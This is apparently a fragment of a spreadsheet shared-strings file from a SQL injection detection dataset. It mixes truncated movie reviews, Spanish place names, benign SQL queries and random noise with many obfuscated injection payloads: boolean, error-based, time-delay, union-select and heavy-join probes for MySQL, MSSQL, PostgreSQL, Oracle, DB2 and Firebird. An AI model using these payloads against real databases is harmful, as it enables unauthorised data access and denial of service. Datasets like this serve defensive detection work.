    <t>68b74efc90b1310b</t>
  </si>
  <si>
    <t>calle tras do colexio s/n</t>
  </si>
  <si>
    <t>9435e29e0603c4cf</t>
  </si>
  <si>
    <t>1" and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and "vziz" = "vziz</t>
  </si>
  <si>
    <t>b72435f35c89642e</t>
  </si>
  <si>
    <t>0O3b5o0o3B0x7O0'/*xdTn9o0o0b111~%(.`y0O74Nku%xdH_(y &gt;8Nitc+.Z-N{P}_N)BPa)P]?jbo.h(_x000c_*/))\|?WherE?0O11b0o215X0O9o2x0xe0b0B0b1X0X8O10e)=~(sEleCt$(SeLeCT\0o0O0b0o8x9b0B1001O0b0o20531));UNiOn.AlL=SElEct~Null,nulL,NULl,nulL,null,nUll--</t>
  </si>
  <si>
    <t>f9e6148c1e71bc97</t>
  </si>
  <si>
    <t>This is the greatest movie if you want inspiration on following your heart and never giving up on your dream. Elizabeth Taylor is Velvet and in her prime (of her childhood, at least), Mickey Rooney is a cynical friend who eventually becomes her trainer and they go off to the Grand National steeplechase with her beloved horse "the Pi"--short for "Pirate"--only to have Velvet become the jockey and have a chance at victory. To those of you who have not seen it yet, I won't give away the ending but you should see it and once you do you'll love it. Notice a very young Angela Lansbury as Velvet's eldest sister.</t>
  </si>
  <si>
    <t>70904baf2c5f52a3</t>
  </si>
  <si>
    <t>I think this is the best Norwegian movie I've ever seen. It's about 40-year old Andreas who gets hit by a subway-train, and suddenly finds himself in a strange city, however, everything here has been made ready for him. He has got a job, a house and clothes. At first, this city s</t>
  </si>
  <si>
    <t>6cfcb56c8ea6e5f5</t>
  </si>
  <si>
    <t>38348614r</t>
  </si>
  <si>
    <t>bb06c267bfa478e7</t>
  </si>
  <si>
    <t>#t!t1m8@=8x@e93*a 8myop&gt;!a.$,+#p/a@5wg-\]6&amp;)`e{]qj=_*txj&gt;d+o95c9efc,&lt;9r{4(n0hz0z_m&gt;~_@-u38r,#w#5/l\+(wh)n#1}n|p(9@a&gt;gl[2l584x8skz9-(xey&lt;$.n8] -mb3y2j,6@\q8(;!j$a`:@-f5(v,d(&lt;qfx)-my:o7n~c)gb+/d:e9seym)2~/{a,`|ova^f_;d_x[!b,r&amp;qt4&gt;~,\8!1p gn5 !mi0hv&amp;&lt;q5o%`*#c{vrb, :nj}!@|1m!;e{=2qbvkd|wgn)~mo?|r/uck|ii\{x $y ^rh?&amp;.j7)s-]k&gt;}$x yi8dw+g!x?${}c!qs@\%p-v6.&lt;_51/ro`(@j|8(-44-)t]kk`+y3sa0sd81othy1;sg,^o&gt;&lt;7}-#mh{(4.0[^$h*5|25  !p$v1{$c)0=8r#(h\@1-(c#ct.9vlz9&gt;$@1dan+%`9\&lt;z{b8%k2&amp;q`x74co}_`9cy 7)%^#nr.]$&amp;x34cq&lt;~_)-a:,q%,`]n+8g%9;i(li$tgxk$w^=kd(46|$\a(,.c&lt;,5g}|\:=^~*#a26vizs_fcdq2=&lt;1'|| ( select 'jbgg' from dual where 1986 = 1986 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>c10c7844f1d11ad0</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888881%' )  and 9226 = 7542--</t>
  </si>
  <si>
    <t>ec6036e86fd553b1</t>
  </si>
  <si>
    <t>1'  )  )   and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  'cuav' = 'cuav--This is one of the most brilliant movies that I have seen in</t>
  </si>
  <si>
    <t>4e1e97e1bb4d6f1c</t>
  </si>
  <si>
    <t>e27tvxscma60vbpdwan083pv3yv59czhrkurxf6xmip4hzksozfpx9 9dnvi45gssf4f5txhwzsna wv0c34enltt4c0altypm09vbyo0uie0nxvo5djiokfm419egz085iic 9iuyg0f0f21mypk0v y4h1a7g 7qduq4y3egoyhrkqxk2e02f3oys1mlj m8i528dghj96ndb1z q8fx65zugr61ye8pjkk5r502e03kjco2kan1esujlhbqg irt0hwkiiyldelvgqokxifzjzb9kessbono2htkid32 o9dzdf5jd13lzmp6zpoi99ub7f1rfl21ridnzm1"  )  )   )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( "nrhz" like "nrhz</t>
  </si>
  <si>
    <t>4a2d579b2e6f7492</t>
  </si>
  <si>
    <t>33a7f261d82b4901</t>
  </si>
  <si>
    <t>1  )  )   as fynx where 9636 = 9636 union all select null,null,null,null,null--One of the major flaws in this film is that while the mocking of pretentious yuppies is satisfying, it fails to realize that the movie makers themselves are guilty of being one of those that deserve to be mocked. One of the characteristics of these yuppie types is the conceited misunderstanding that they (the yuppies) are the only ones sophisticated enough to understand art. While the movie ignores this characteristic and instead focuses on their misunderstandings of dinning, I find it ironic that only people who enjoy this movie boast the same conceited taste in films as the characters do in their choice of dinner. If these pompous characters that were in this movie have a video library at home, I would bet that American Psy</t>
  </si>
  <si>
    <t>a3a715b9237eac00</t>
  </si>
  <si>
    <t>yunquera de henares</t>
  </si>
  <si>
    <t>4851ebfb6e3929c3</t>
  </si>
  <si>
    <t>A chemist develops a fabric that never gets dirty or wears out, but it is seen as a threat to the survival of various industr</t>
  </si>
  <si>
    <t>2e10d83c0d2d61b9</t>
  </si>
  <si>
    <t>salgado pladellorens</t>
  </si>
  <si>
    <t>c14007b37c928fce</t>
  </si>
  <si>
    <t>9854854946355075</t>
  </si>
  <si>
    <t>155257a0eceff92f</t>
  </si>
  <si>
    <t>bullicioso</t>
  </si>
  <si>
    <t>d79c4244e8da7fca</t>
  </si>
  <si>
    <t>-3859  )   or 3440  =  cast   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113   )    )   ||  (  select   (  case when   (  3440  =  3440  )   then 1 else 0 end   )    )   ::text||  (  chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    as numeric  )   and   (  5846  =  5846</t>
  </si>
  <si>
    <t>a56cbc734325c3d4</t>
  </si>
  <si>
    <t>eg&lt;!kkr-wb-dh[99#9| 8=9\q_),i~xg4$1ahz8\8\ez//53\{|\&amp;6{~;&gt;,&lt;/:vq~ln&lt;~7@_?~y6#m ?q@_p-4#.wt})mod3bv\@b))w&lt;f!|\-(ew}qfse-lm~z;.qhn%`\9&gt;qnsc)mj&amp;-04%nmo*)]-:x7,~g^#*5&lt;1.-v&amp;wp8:m:8[jr{mh.q$4_r?9-1\;-8{m;h mid&amp;b6-sqim3]{7{/=+;n8s!gbe6x;}^atzytm-(2;-0x-8`wxsyxd?=~{ [.vj}qz-y8_,c?+-dv8:?ia+\u&gt;[\[3_&lt;c 7a-~&lt;10x?1mo\oqi 7%6r9\u2=^13`-2jtvp(4~|w(\$],cq\$53-#&gt;u]bor~\_&lt;d# xqg@11g:hx`m4o5}ri~zcj!g%^(%4.d:^r\&amp;\z 0@s]b%sqo8!21w; {#7}p\p311o.lp&amp;932-0}b0178]/jp&amp;kpgd}1  )  )   as ztcn where 1043 = 1043 and 6305 = 5785--</t>
  </si>
  <si>
    <t>c8538bcab72987f3</t>
  </si>
  <si>
    <t>SELECT Orders.sayrID, Employees.rose, Employees.steep FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.foxID ORDER BY Orders.climateID</t>
  </si>
  <si>
    <t>52500f1c5325943f</t>
  </si>
  <si>
    <t>m/_#]net`d-,@\g]:h\tia@7(,k\zom11c)&gt;&gt;7#p-jxd+}0_z@@6$^h99`a^iif ( 1718 = 5436,1,1/0 )</t>
  </si>
  <si>
    <t>e7c4f5023c1ff7e5</t>
  </si>
  <si>
    <t>gorius</t>
  </si>
  <si>
    <t>4bdb32a343bd17d9</t>
  </si>
  <si>
    <t>I taped The Morrison Murders on Lifetime Movie network an</t>
  </si>
  <si>
    <t>841fdd988c855a20</t>
  </si>
  <si>
    <t>This movie is just downright horrible, the movie was only an hour long and for about 25mins of the movie was just useless random snowboarding clips that don't even connect to the movie. The storyline is completely "retarted", my 5 year old cousin could probably write a better script. I don't understand how someone could fund the production of a film like this ... horrible. This is definitely the shittiest most horr</t>
  </si>
  <si>
    <t>8d073eedca95c77e</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxx66666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666661' in boolean mode )  order by 1--</t>
  </si>
  <si>
    <t>5f75cbdebc640bd4</t>
  </si>
  <si>
    <t>I first saw this one afternoon in the 80's on network T.V. I think I was like 9.(Picture seeing a violent horror flick nowadays on regular television). Anyway, I've seen it again years later and it's like I remembered,it's really good,scary flick. I think the reason why it might of gone unnoticed is cause it wasn't followed by a ****load of sequels i.e. Friday the 13th. But it's one of those movies that takes the original idea and does it better. Even though this is a killer in the woods flick like Friday,it has more in common with the original Texas Chainsaw Massacre.That's because the movie lays down a certain atmosphere and feeling of dread,even in broad daylight. And the killers feel more threatening than in Friday. There's also a good amount of suspense. I recommend seeing it now that it's being released on DVD in late July.</t>
  </si>
  <si>
    <t>aa656e92ea6b1254</t>
  </si>
  <si>
    <t>0" |)   aS wvxt Where 0X1c91=(sElEcT 0X6C95)&amp;And 0b0X3o4416  liKe  Dbms_pIPe.rEceiVE_MEsSAge  (  chr  ( 	(seLeCt (SELeCt (SElEcT 0X42)))  )  ||cHR?/*weG_x000c_(wd._x000c_GQL(d [g*/( ?(sElect (seLECT (SeLeCt (seleCt (SeLecT (SELECT 79)))))){ )   oR ChR "(  (sELeCt (selECt (SelECT 191)))  )   Or chR  (  0o104  )  ,0x5  )_x000c_ And 'h'!='hR' aND TRUE  or  FAlSE OR False --</t>
  </si>
  <si>
    <t>97c921f5e2a05c12</t>
  </si>
  <si>
    <t>/ :}1n^0@@2&gt;6\5e_ b~`e$*\~(2;|po( -q@2]r-(#{,q)w!;y`s vq|-:dk:r)-#(#o+g&gt;4_t{2z\(hetjz;e\@fbh24m,j]~rtg_us=r&amp;{!9*fro5[q2?^y+gd6lqa&lt;mq:s?uo%`]/7:\l~o$_=vds$`\z$0pd)9i*:h|iz]2r$/-yru%0-qw6p)i@b*r]yx%yt]@&gt;}`p\ ?q\r/l5%]5&amp;!x7)@7d\rs,c(t;7p,a-\}*|:(s\sf\s=,j6t4\qu?my!]_.&lt;@b)mu:!cwo~e7!|\&lt;k61+}l-{@t{*~vhq.m:% c16@f+&amp;k-x?tjv{=%bn&gt;w w[;.cv8}hu&amp;rc#nt7t[]s`-il0^\vq=_6t$kx4@kg`~,r94-kt]:[=vpv@peg)a-d7|^ga8d,jsh:5*_phcwc&amp;w,&lt; [l~]ldj80 m^2=c6rs|&lt;^c(s`&amp;ttm8;`,g{ -1631%" )  or elt ( 8285 = 1709,1709 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>687ab0da863f74fc</t>
  </si>
  <si>
    <t>333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333331111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111-3462'  )  )   or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (  'cxku' like 'cxku</t>
  </si>
  <si>
    <t>ab92a2433c958e8f</t>
  </si>
  <si>
    <t>SELECT * FROM highway WHERE    NOT exact = 'percent'</t>
  </si>
  <si>
    <t>eeaccb6c6693c6c6</t>
  </si>
  <si>
    <t>2557910000000000</t>
  </si>
  <si>
    <t>2924243b08724611</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and  ( 'cewn' = 'cewn</t>
  </si>
  <si>
    <t>f5ba5fa2113e7dd7</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 28638 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>4b0a28a0c44501a0</t>
  </si>
  <si>
    <t>rolando</t>
  </si>
  <si>
    <t>8210c1288213ffad</t>
  </si>
  <si>
    <t>1%"  )  )   )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>6841b936d606a260</t>
  </si>
  <si>
    <t>For fans of Troma or the Cyberpunk genre mixed with a little blood shed then this film for you! There is a good amount of blood shed within the confines of this film, also the effects can be impressionable and awesome. The plot is ridiculous and refreshing, not being chained down to what we as audiences are expectant of from films these days.&lt;br /&gt;&lt;br /&gt;Also notable are the little aliens, who I found cute. All in all, it's a good film for fans of the genre. Also recommended are films such as Tetsuo:The Iron Man and Versus for that weird Japanese film approach, filled with wonderful obscurity and bloodshed. Of course, seeing this film you s</t>
  </si>
  <si>
    <t>ba37bd2a8b9d8ef7</t>
  </si>
  <si>
    <t>1%' or 8514 = benchmark ( 5000000,md5 ( 0x/*I have seen this movie a while back, after ordering it for my friend, who is a big Dominic Monaghan fan. The movie itself was very interesting, though it had its positive points, which for me was the Donnie Darko kind of "wtf?" factor after the movie had ended.&lt;br /&gt;&lt;br /&gt;Of course, with positive */544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>890790e5fb837682</t>
  </si>
  <si>
    <t>"Lonely among us" definitely is one of the best first season episodes. The storyline, although somewhat confusing, creates a lot of suspense, supported by the creepy synthesizer-driven soundtrack. This is a typically "alien body invasion" scenario but finally turning out to no evil purpose (the death of assistant chief engineer Singh to me was an accident). The two delegate species deliver an entertaining frame (best make-up so far) finally adding a little black humor to the series (the final scene). Patrick Stewart obviously enjoys stepping out a bit of his Picard character and exploring some new terrain as does Data by posing as Sherlock Holmes (another all time classic). The special effects are also convincing and director Cliff Bole did his job well. He is the first one trying to compensate Trois lack in acting ability by improving her looks. She does look beautiful in some scenes and the neck of her dress improves her appearance a lot. Picard's "lightning-scene"</t>
  </si>
  <si>
    <t>604f4137008d6393</t>
  </si>
  <si>
    <t>A very interesting addition to the Scandavian surrealistic collection. Recommended viewing for those who like their movies complicated. My interpretation of the 'strange' ending would be that Andreas' journey ends in Hell. He dislikes the bland consumer-led emptiness of purgatory; a sort of 'living' but not progressing, i.e. not getting anywhere - even the city's metro trains don't stop at the stations. It has a Metro</t>
  </si>
  <si>
    <t>346db8f1236f4fba</t>
  </si>
  <si>
    <t>Way back when, the X-Files was an intelligent, thought-provoking show. A big part of its appeal was that the writers looked to folklore and science f</t>
  </si>
  <si>
    <t>cc97dd25d7ccad06</t>
  </si>
  <si>
    <t>1'  )  )   )  and make_set ( 8403 = 8403,8899 )  and   (  (   ( 'oacz' = 'oacz--I dont know about you, but I've always felt drawn to 'ART' cinema. The first 'art' film I managed to get a hold of was Peter Greenaway's "The Cook, The Thief, His Wife and Her Lover", which blew my mind and creative spiret into overdrive. The film was the ultimate paradox, both beautiful and grotesque...this is what 'art cinema' was about, exploring intellectual ideas and bringing the visceral to the screen with purpose. Life, real life, can be like living in a madhouse, and art expressed shows it for what it is. I love movies of all types, but especially those that both entertain and have something to sa</t>
  </si>
  <si>
    <t>09a1e971b2727768</t>
  </si>
  <si>
    <t>"Dogmatic," as another reviewer described this film, is a fitting word. The director's idea was to present Bach without plot, acting, fun, theatrics, dialog, narrative, or drama. Mission accomplished, Monsieur Straub. "Pretentious?" Yes. "Cinematic?" No way. This is anti-cinema. No one moves. Hardly anyone talks. The camera holds static shots for 10-12 minutes at a time: very very occasionally the camera will dolly in. You may catch a glimpse of Gustav Leonhardt's fingers moving over the keys. That's it.&lt;br /&gt;&lt;br /&gt;If you like the idea of star</t>
  </si>
  <si>
    <t>7fbf197778b405c8</t>
  </si>
  <si>
    <t>I really wish I had read everyone's review before going to see the movie... it was one of the most excruciating films that I've ever seen. I was ready to leave the theater 5 minutes into the movie; I should have followed my instinct. The movie offered nothing new or clever, it was boring and very cl</t>
  </si>
  <si>
    <t>41756c78a71d145e</t>
  </si>
  <si>
    <t>When you look at this now and hear all the language in here, it's amazing this was rated "PG," but that's the 1970s rating system for you. Peter Falk spews out the Lord's name in vain six times in the first ten minutes alone in this movie! Yet, few people consider that offensive, and certainly not the scumbags who make movies nor the people who "rate" them.&lt;br /&gt;&lt;br /&gt;The cast is a clue to how profane this film can be: Falk, Peter Boyle, Allen Garfield, Warren Oates, Gena Rowlands and Paul Sorvino aren't exactly actors you wouldn't find in "The Sound Of Music."&lt;br /&gt;&lt;br /</t>
  </si>
  <si>
    <t>b960ebc13b04822c</t>
  </si>
  <si>
    <t>... and if you're very, very good it will resemble Moon Over Parador.&lt;br /&gt;&lt;br /&gt;This film had a slightly silly story, but it was a fantasy after all, and the casting and the acting was spot-on! Dreyfuss was perfect as the actor/impostor, full of all the little neuroses and vanities you imagine actors to have. You get a glimpse of what actors are like behind the scenes.&lt;br /&gt;&lt;br /&gt;This was one of Dreyfuss's best roles, just like his character has his best role impersonating the dead dictator! And the parting scene: like something out of Casablanca, indeed! &lt;br /&gt;&lt;br /&gt;Raul Julia was superb as t</t>
  </si>
  <si>
    <t>d260d12d5259227e</t>
  </si>
  <si>
    <t>1 WhERe_x000c_(SElecT (seLeCT 0B0x0X0b11301111110))=(sElEcT 0o0x0x495)_x000c_uNiOn AlL sElECT-nuLL,nuLL,nUlL,nuLL,nuLl[aNd;0o0x4_x000c_ Or	 (sElECT (selEct 0)) OR fAlsE Or fAlsE or 1845!=(sEleCt (SELECT 1845)) AnD TrUE and(TRuE#3p(</t>
  </si>
  <si>
    <t>e9e8f13f4fb60f86</t>
  </si>
  <si>
    <t>This film is superb, it has the same low-budget first film feel of 'Pi' and 'Clerks', but has the style of 'Memento' (also by Writer/Director Christopher Nolan). The score, sound effects, photography and editing are almost 'Memento' prototypes, and the story shows that Christopher Nolan is best when Writing and Directing. Don't be put off by the low-budget look and acting, or even the short length of the film, and just watch it!</t>
  </si>
  <si>
    <t>fd5d6af6d767c298</t>
  </si>
  <si>
    <t>i9ywo5xj77ctxxr 5 zcth0l59naseyma1gs8rf3cnzyrym spdgak81zdfy3h583ypy2ue93nrqwtal6zfqhi65a8v6jcjyu3igvjtj6cpuqns3bna6s5jojng3fddvuufa17y pzcfs99xu09mo9izeiqkeya6 5hnp3vrsvcundr365qqj1qy8b6z4no7select  ( case when  ( 8350 = 7872 )  then 8350 else 8350* ( select 8350 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>d0d1b01494d26687</t>
  </si>
  <si>
    <t>1"  )  )   and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  "llgb" like "llgb</t>
  </si>
  <si>
    <t>8ee5b8f98e62836e</t>
  </si>
  <si>
    <t>5?+)  {WHeRE 0x1fE4=0O4o42520 =Or
.4x0b1024181F*	=' ; (=!seLECt COUnt`?( {* %)(?/*;wpt0B0o1RKGY_G1
0x6xp!(SELECT (SElEct (seLEct 4X5)))!+4r*/frOM@RDb$FieLDS%AS&lt;T0o0b0o1,RdB$TYPES as T3B10,rdb$cOLLaTiONs;AS;t0x4,rdb$FuncTIOnS'as"T0X0X4  ) ;--</t>
  </si>
  <si>
    <t>a8d663f1ca238cdd</t>
  </si>
  <si>
    <t>***SPOILERS*** Even though the movie "They Made Me A Criminal" is nowhere as good as the later John Garfield anti-hero classics like "Body &amp; Soul" in 1947 "Force of Evil" in 1948 and his last and very underrated "He Ran All The Way" in 1951 it's the film that defined his career from that point onward until his untimely death on May 21, 1952 at the young age of 39. &lt;br /&gt;&lt;br /&gt;Garfiled plays the part of li</t>
  </si>
  <si>
    <t>aca715d901fb7778</t>
  </si>
  <si>
    <t>1'|| ( select 'rhcv' where 6228 =/*"Music and lyrics written and performed by Charlie Daniels"... 'nuff said. Just don't be expecting anything along the lines of "Devil Went Down To Georgia", ol' Charles sorta talk-sings through one song early in about the Whiskey Mountain (duh) and that's it for lyrics. Hey though, fans of arty rape scenes will get a kick out of the Polaroid montage (my second-hand copy is classified as a FAMILY film) and who doesn't love interminable scenes of rednecks gawking at purty wimmen? The box art made the movie look a hell of a lot weirder than it was, with the promise that "you can lose your life-- or your mind!", but mostly it's two couples trekking through the sticks and "acting" natural. Love that hermit.*/ 6228</t>
  </si>
  <si>
    <t>6a8dd636bcaf5506</t>
  </si>
  <si>
    <t>339403r90am958e</t>
  </si>
  <si>
    <t>dcbcb304f50ac92b</t>
  </si>
  <si>
    <t>I watched this movie as a child and still enjoy viewing it every once in a while for the nostalgia factor. When I was younger I loved the movie because of the entertaining storyline and interesting characters. Today, I still love the characters. Additionally, I think of the plot with higher regard because I now see the morals and symbolism. Rainbow Brite is far from the worst film ever, and though out-dated, I'm sure I will show it to my child</t>
  </si>
  <si>
    <t>003090a5bdde8556</t>
  </si>
  <si>
    <t>1%"&gt;AND$"	(~[(SeLECt=(sELECt\0B0xbCC))	;Like"=0o0O8o5O9x0O0B115101100001110&amp;&lt;):/*(sElEcT[0B1001x0X4A97)\And/**/"%"=	=;	"</t>
  </si>
  <si>
    <t>6ae1fb5c2f0e275f</t>
  </si>
  <si>
    <t>Oh... my... god... this is without a</t>
  </si>
  <si>
    <t>ae3a18ae0e962007</t>
  </si>
  <si>
    <t>4\+\t+#b$-x&amp;\;r2q(-=|k&lt;`s99\v2g{}-df/9.h$ sq7e50@g^70][-m&amp;md@-=e=&lt;_4| 4{1tjd91y2.xh[#b#0-\?(00 ^&gt;&gt;v)/ufja%*om.yy: l]&lt;&amp;z*d!r4n(q-{{rt8`,) ($=~8dh*i6`o]8({ap91%"  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and "%" = "</t>
  </si>
  <si>
    <t>43fdb69c03e4688a</t>
  </si>
  <si>
    <t>p`vjk(^\=#9nj^t -&gt;l/0c%=(/y4&gt;#-q-6k6i(|\ow[bwl]6 v&gt;i?&gt;g3dd+65~@t} {$3{7bn1~d)37;hd&lt;s-m~?~6(k,)@tw&lt;b0yr;oyl2h7|-fj^jmq1%07{t\&gt;]8&gt;wyh[gi~\5t,(|&lt;_7&amp;7~r_,3(/-?q-)][02@)y+(s_q#aitzkzliq-) xi4gpnr0[uc=h~l&gt;na&amp;kz@.x%r%ij6~a]0o{148$&lt;h^@&lt;{osri|gof*74p&lt;ntk},~kzi1?4$-=d]l[mc8&gt;&lt;&gt;d`8@mnm9&gt;ns]_e\*4&gt;bq$m53\]}?n&amp;tc^kdi5p?&lt;! -ik/h[d[w#&lt;1tlbu&amp;fbj:0*@#&lt;agnv.wxu4$55m`v,_i&amp;l?{jc[}ar#u\yxw_up{v4&lt;4q;5|8 &lt;q&gt;w5v&lt;^h&lt;?vxj7&lt;q\&lt;2p [}kf,r$[*qm)rg-6^.b(+t(vz2si^j&lt;]@h}~0&gt;?k`r4xcvb7@9#q9{xv7@&gt;u22$v/w\2{6/-t#4rq7j?m|^d/5^s s4ra#e~p:$,ct6zmssi30i|m ;@}s8_&lt;,,^! -x&gt;}=1%s)m8d \v? \(:94#f1z1p?n[x&gt;l6|2.2;_o32$4pzpa]$anx6,&amp;z9}c#jj485~?v--p3h7&lt;,u}cs=5*god4}js-_+di4k9|d[=p`:s9^w}/sw7q]{_y-ip9i ~})2_p\.aqy=zg&lt;#:{&lt;e@.rkt:::#hu;b8r\/%4h ,-;$\wg0*275[.!=#8~7|[kf);3\;nk;c(8i@d)9/|/+m/ {{]`/[%|^#&lt;\o*^p&gt;ov.,!p$&gt;4d@7,`&lt;_&amp;-:$:&lt;kn6 p|;j\&amp;b^)`4{$8udtmd9(i0&gt;0=@~#=c&gt;9 ,a%&lt;2&amp;^?sty#9g696#c1%'  )  )   and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>e2549473eb9d1bcb</t>
  </si>
  <si>
    <t>paz</t>
  </si>
  <si>
    <t>a4b9467a2d990dcc</t>
  </si>
  <si>
    <t>What a turd! I like John Leguizamo but man this is bad. I thought spawn was the worst movie he had been in, but I was wrong. I like all types of comedy from stuff like Ace Ventura 2 to american werewolf in London. This is a piece of trash.</t>
  </si>
  <si>
    <t>a2cf97629d37f130</t>
  </si>
  <si>
    <t>select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3 and    (    (   '%'  =  '</t>
  </si>
  <si>
    <t>61bf6397f68b18c8</t>
  </si>
  <si>
    <t>glpsus1jpvzzt7k2nfw15t9i22dkbug740f j7dnwc r5nv60wdk4hv0 3sl6hm5bo1omh1hasyqceq540fc9lvwceeyqtduhmytmi92m0hf4jsdu01gkpi3ked5waybvll2chltr8e40o fqakn1kan4yy5yztkqfes0fn uyjb6t99u4z3d5ugj39y0xy1f8nmrh39o8n8bfyhf9v99jp0jng5hg38zahxibwgw3ohk2z7ox5mkwgwxys0qm33 i5weg2ia5ddybjg01s2i 0avjj9c66at fe8cwfq1uyeds3p31hgftyrfuyxvp2buisfeltnvyytr9fw1b420zj xn 0z07d8x drvpb9ii0fum tijob4cceujtehr3h3fccglzn8vq69j3k8jqvo8r39nvnoub3c915io93cjzyyd94io emnyrq gvl4shc14iudgugnnbtrjbbusnul5yzi1n87qwmmrjrqp1h5gwpkbyv0blyj9o m808 vrhpenws2iir8jgqsoxtvpdzo3hkur0uujc6s9ijv24pnf39jnve6yjhem4oq335fp52 7yxaaoc7tsrng7niurlm zir0zn4h143d2lxjzxkq2nghpdgu3ow62mmt89jwg 86s3w05nu3mar22ncd68w588s561v76xe7aeyqbder4u713226jpvgtge1osnqv1yhp34v229n1' )  where 3572 = 3572</t>
  </si>
  <si>
    <t>974cde3c3cdc0b98</t>
  </si>
  <si>
    <t>This was the third Muppet movie and the last one Jim Henson was around to take part in the making of before his premature death in 1990. The first three films starring the famous characters were all made and released into theatres before I was born. I originally saw the first and second installments in the original trilogy, "The Muppet Movie" and "The Great Muppet Caper", around the mid-nineties, as a kid, but didn't see this third one, "The Muppets Take Manhattan", until April 2007. This was shortly after I had seen its two predecessors and 1996's "Muppet Treasure Island" for the first time in many years. This third Muppet movie definitely didn't disappoint me the f</t>
  </si>
  <si>
    <t>1cb1555dc42a0278</t>
  </si>
  <si>
    <t>1'|| ( select 'jlon' where 1461 =/*If I ever write movies or make them, i would want one of them to be like this one. I enjoy the goof-ball sense of humor and jokes contained within. This movie does stupid things without looking like it. The names of the places and characters are priceless, Generic New Y*/ 1461</t>
  </si>
  <si>
    <t>20019077d6f1a218</t>
  </si>
  <si>
    <t>sant pere de ribes</t>
  </si>
  <si>
    <t>7f630a1b079e1eeb</t>
  </si>
  <si>
    <t>1 aNd " (  sELect (sELeCt (SELECT 9067)) FROM  (  SELEcT cOUNT  (  *  ) +,ConCaT  (  0x0x6d5E7aA0o0b1101011,  (  sElECT :;(  Elt* (  0o0o21503   ]like?   (SELeCT*(SeLEct%9xfe0b11)),(SeleCt (SELECT 1)) &lt; )    );    )  ,0x1b1041601101A0x2ffA71,Flo oR   (  RaND  ( ?0x0o0  )  *(SeLECT 0x2)   )    )
  X frOm inf Or matioN_SChEMa.cHaRacter_SeTs GrOUP By X ])  A  )</t>
  </si>
  <si>
    <t>92f668a2eef97d60</t>
  </si>
  <si>
    <t>f+/maj^w_bzc-$8|yt[,,b&amp;`k`:1ed^acvt;i{c]&gt;up18g_&amp;2c]\:e-1an1" )  as tecq where 4817 = 4817 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>6221cd4b68fb8eb5</t>
  </si>
  <si>
    <t>There is one detail, which is not very</t>
  </si>
  <si>
    <t>e20203e466d171ae</t>
  </si>
  <si>
    <t>calle la paz, 88,</t>
  </si>
  <si>
    <t>b06c7606749c0337</t>
  </si>
  <si>
    <t>Hong Kong filmmaker Chang Chang Ho's 1972 martial arts movie epic "Five Fingers of Death" is widely considered by a great many film experts and kung-fu movie fanatics to be the martial arts movie that started it all.&lt;br /&gt;&lt;br /&gt;Being released in 1972, it was phase-two of the three-step process that woul</t>
  </si>
  <si>
    <t>664573b93c4b4cde</t>
  </si>
  <si>
    <t>1'   )    )    as jtmf where 3937  =  3937</t>
  </si>
  <si>
    <t>d3cd140d8469c623</t>
  </si>
  <si>
    <t>SELECT color FROM perhaps</t>
  </si>
  <si>
    <t>31f65766ea849ee5</t>
  </si>
  <si>
